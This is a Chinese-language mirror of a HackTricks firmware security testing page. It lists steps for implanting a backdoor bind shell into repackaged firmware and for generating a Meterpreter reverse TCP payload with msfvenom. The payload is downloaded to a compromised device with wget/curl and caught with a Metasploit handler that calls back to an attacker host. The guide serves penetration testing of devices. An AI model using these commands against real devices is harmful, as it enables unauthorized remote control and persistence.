mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 14:40:37 +00:00
4.9 KiB
4.9 KiB
通过 htARTE (HackTricks AWS Red Team Expert)从零开始学习AWS黑客攻击直到成为英雄!
支持HackTricks的其他方式:
- 如果您想在HackTricks中看到您的公司广告或下载HackTricks的PDF,请查看订阅计划!
- 获取官方的PEASS & HackTricks商品
- 发现PEASS家族,我们独家的NFTs系列
- 加入 💬 Discord群组 或 telegram群组 或在 Twitter 🐦 上关注我 @carlospolopm。
- 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享您的黑客技巧。
本页面内容复制自 https://scriptingxss.gitbook.io/firmware-security-testing-methodology/
尝试上传自定义固件和/或编译后的二进制文件,检查完整性或签名验证漏洞。例如,使用以下步骤编译一个在启动时运行的后门绑定shell。
- 使用固件修改工具包(FMK)提取固件
- 确定目标固件的架构和字节序
- 使用Buildroot构建交叉编译器或使用适合您环境的其他方法
- 使用交叉编译器构建后门
- 将后门复制到提取的固件的/usr/bin目录
- 将适当的QEMU二进制文件复制到提取的固件rootfs
- 使用chroot和QEMU模拟后门
- 使用netcat连接到后门
- 从提取的固件rootfs中移除QEMU二进制文件
- 使用FMK重新打包修改后的固件
- 通过使用固件分析工具包(FAT)模拟后门固件并使用netcat连接到目标后门IP和端口来测试后门固件
如果已经通过动态分析、引导程序操作或硬件安全测试等手段获得了root shell,尝试执行预编译的恶意二进制文件,如植入物或反向shell。考虑使用用于命令和控制(C&C)框架的自动化payload/植入工具。例如,可以使用Metasploit框架和'msfvenom',按照以下步骤操作。
- 确定目标固件的架构和字节序
- 使用
msfvenom指定适当的目标payload (-p),攻击者主机IP (LHOST=),监听端口号 (LPORT=),文件类型 (-f),架构 (--arch),平台 (--platform linux或windows),以及输出文件 (-o)。例如,msfvenom -p linux/armle/meterpreter_reverse_tcp LHOST=192.168.1.245 LPORT=4445 -f elf -o meterpreter_reverse_tcp --arch armle --platform linux - 将payload传输到被攻陷的设备(例如,运行一个本地web服务器并使用wget/curl将payload下载到文件系统),并确保payload具有执行权限
- 准备Metasploit来处理传入请求。例如,使用msfconsole启动Metasploit,并根据上述payload设置以下参数:使用exploit/multi/handler,
set payload linux/armle/meterpreter_reverse_tcpset LHOST 192.168.1.245 #攻击者主机IPset LPORT 445 #可以是任何未使用的端口set ExitOnSession falseexploit -j -z
- 在被攻陷的设备上执行meterpreter反向🐚
- 观察meterpreter会话开启
- 进行后期利用活动
如果可能的话,识别启动脚本中的漏洞,以在设备重启后获得持久访问权限。当启动脚本引用、符号链接或依赖于位于不受信任的挂载位置(如用于存储根文件系统之外数据的SD卡和闪存卷)中的代码时,就会出现此类漏洞。
通过 htARTE (HackTricks AWS Red Team Expert)从零开始学习AWS黑客攻击直到成为英雄!
支持HackTricks的其他方式:
- 如果您想在HackTricks中看到您的公司广告或下载HackTricks的PDF,请查看订阅计划!
- 获取官方的PEASS & HackTricks商品
- 发现PEASS家族,我们独家的NFTs系列
- 加入 💬 Discord群组 或 telegram群组 或在 Twitter 🐦 上关注我 @carlospolopm。
- 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享您的黑客技巧。